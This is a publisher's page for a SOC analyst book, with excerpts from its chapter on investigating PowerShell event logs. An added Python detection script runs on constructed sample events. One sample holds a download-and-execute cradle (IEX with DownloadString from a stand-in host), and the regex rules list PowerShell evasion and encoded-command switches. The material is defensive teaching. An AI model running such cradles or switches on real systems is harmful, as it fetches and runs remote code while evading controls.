Effective Threat Investigation for SOC Analysts

Product type: Book
Published in: Aug 2023
Publisher: Packt
ISBN-13: 9781837634781
Pages: 314
Edition: 1st Edition
Author: Mostafa Yahia

Table of Contents (22 Chapters)

Preface
1. Part 1: Email Investigation Techniques
2. Chapter 1: Investigating Email Threats
3. Chapter 2: Email Flow and Header Analysis
4. Part 2: Investigating Windows Threats by Using Event Logs
5. Chapter 3: Introduction to Windows Event Logs
6. Chapter 4: Tracking Accounts Login and Management
7. Chapter 5: Investigating Suspicious Process Execution Using Windows Event Logs
8. Chapter 6: Investigating PowerShell Event Logs
9. Chapter 7: Investigating Persistence and Lateral Movement Using Windows Event Logs
10. Part 3: Investigating Network Threats by Using Firewall and Proxy Logs
11. Chapter 8: Network Firewall Logs Analysis
12. Chapter 9: Investigating Cyber Threats by Using the Firewall Logs
13. Chapter 10: Web Proxy Logs Analysis
14. Chapter 11: Investigating Suspicious Outbound Communications (C&C Communications) by Using Proxy Logs
15. Part 4: Investigating Other Threats and Leveraging External Sources to Investigate Cyber Threats
16. Chapter 12: Investigating External Threats
17. Chapter 13: Investigating Network Flows and Security Solutions Alerts
18. Chapter 14: Threat Intelligence in a SOC Analyst’s Day
19. Chapter 15: Malware Sandboxing – Building a Malware Sandbox
20. Index
21. Other Books You May Enjoy

Investigating PowerShell Event Logs

Since 2017, security researchers have noted a sharp increase in the use of PowerShell across the different phases of the attack chain. There are also several ready-to-use PowerShell scripts and frameworks that help attackers achieve objectives such as stealing credentials, pivoting, internal discovery, and enumeration. As a SOC analyst, you should understand PowerShell and its uses, know how to investigate suspicious PowerShell activity, and be familiar with the event logs provided by Microsoft that help you track and investigate suspicious PowerShell executions.

The objective of this chapter is to teach you what PowerShell is, why attackers prefer PowerShell, PowerShell’s usage in different attack phases, the events provided by Microsoft that allow you to track PowerShell execution activity, and examples of the techniques and command-line arguments of PowerShell attacks.

In this chapter, we’re going to cover the following...

Introducing PowerShell

PowerShell is a Microsoft command-line shell and scripting tool introduced by Microsoft in 2005 and installed on all new Windows versions by default for automation and configuration management. PowerShell is designed for system administrators as it is a very powerful tool that allows you to control and manage almost the entire system with secure remote capabilities.

PowerShell extends its functionality through cmdlets (pronounced command-lets), which are collections of specific commands that let PowerShell users carry out specific tasks, such as connecting remotely to another system, displaying processes, and more. Cmdlets follow a verb-noun naming pattern and commonly consist of three entities – a verb, a noun, and an option: verb-noun[-parameter]. See some examples here:

  • Get-Process -name svchost: The Get-Process cmdlet is used to obtain information about the processes running on a computer. By specifying the -name parameter followed by...

PowerShell execution tracking events

In addition to Event ID 4688, which logs the execution of a PowerShell process along with its command-line arguments, Microsoft records several event logs that allow you to track PowerShell activity. Some of these events are generated by all PowerShell versions, and some are generated only when specific PowerShell versions are installed. In this section, we will discuss three events that are valuable for investigating and tracking suspicious PowerShell execution. They live in two PowerShell event log files: Event ID 800 is written to the Windows PowerShell event log, while Event IDs 4103 and 4104 are written to the Microsoft-Windows-PowerShell/Operational event log.

From PowerShell version 5 onward, Microsoft has provided a new logging feature to log entire executed PowerShell script blocks. By default, the script block logging feature is disabled, but it automatically logs any suspicious script execution...

Investigating PowerShell attacks

In the previous sections, you learned about the PowerShell and Windows event logs that help you investigate suspicious PowerShell executions. In this section, we will introduce an example of a PowerShell attack and examples of suspicious PowerShell commands and cmdlets, along with their description and purpose, to help you investigate and recognize suspicious PowerShell executions.

Fileless PowerShell malware

Fileless malware, also known as memory-based malware, refers to a type of malicious code that runs directly in memory without leaving traces of traditional executable files on the system disk.

An attacker may use a PowerShell cradle to download a malicious PowerShell script and execute it directly in memory, avoiding writing to disk and evading detection by defense mechanisms. The following is an example of a common PowerShell cradle that uses the DownloadString function to download a malicious script from a remote server to...
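As an added example (not code from the book), the following Python triage runs simple detection rules over constructed records modelled on the events named in the PowerShell execution tracking events section (4688, 800, 4103 and 4104) and flags the download-cradle and in-memory execution patterns described above for fileless PowerShell malware; it also decodes the base64 payload of an encoded command line, which is the next thing an analyst needs when a 4688 hits. The event messages, the example.invalid URL and the rule set are constructed assumptions, not real log exports.

```python
import base64
import re

# Constructed sample records modelled on the fields of the events the chapter names:
# 4688 (Security), 800 (Windows PowerShell) and 4103/4104
# (Microsoft-Windows-PowerShell/Operational). Not real log exports.
SAMPLE_EVENTS = [
    {"channel": "Security", "event_id": 4688,
     "message": "New Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
                "Process Command Line: powershell.exe -nop -w hidden -ep bypass -enc SQBFAFgA"},
    {"channel": "Microsoft-Windows-PowerShell/Operational", "event_id": 4104,
     "message": "Creating Scriptblock text (1 of 1): IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage.ps1')"},
    {"channel": "Microsoft-Windows-PowerShell/Operational", "event_id": 4103,
     "message": "CommandInvocation(Get-Process): ParameterBinding: name=\"Name\"; value=\"svchost\""},
    {"channel": "Windows PowerShell", "event_id": 800,
     "message": "Pipeline execution details for command line: Get-ChildItem C:\\Users"},
]

# Detection rules: (name, event IDs the rule applies to, case-insensitive regex).
RULES = [
    ("download_cradle", {800, 4103, 4104},
     r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient"),
    ("in_memory_exec", {800, 4103, 4104}, r"\bIEX\b|Invoke-Expression"),
    ("encoded_command", {4688, 800}, r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b"),
    ("evasion_switches", {4688},
     r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass"),
]

def triage(events):
    """Return (event_id, channel, [matched rule names]) for each event that hits a rule."""
    hits = []
    for ev in events:
        matched = [name for name, ids, pattern in RULES
                   if ev["event_id"] in ids and re.search(pattern, ev["message"], re.IGNORECASE)]
        if matched:
            hits.append((ev["event_id"], ev["channel"], matched))
    return hits

def decode_encoded_command(cmdline):
    """Recover the script behind -e/-enc/-EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

if __name__ == "__main__":
    for event_id, channel, rules in triage(SAMPLE_EVENTS):
        print(f"{channel} {event_id}: {', '.join(rules)}")
    print(decode_encoded_command(SAMPLE_EVENTS[0]["message"]))
```

The benign Get-Process and Get-ChildItem records produce no hits, which is the point of scoping each rule to the event IDs whose message field can actually carry that pattern.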

Summary

In this chapter, you learned what PowerShell is, why attackers prefer PowerShell, PowerShell’s usage in different attack phases, the events and logs provided by Microsoft that allow you to track PowerShell execution activity, and examples of techniques and command-line arguments typical of PowerShell attacks.

In the next chapter, you will learn about persistence and lateral movement techniques and how to investigate and track them using the event logs provided by Microsoft.
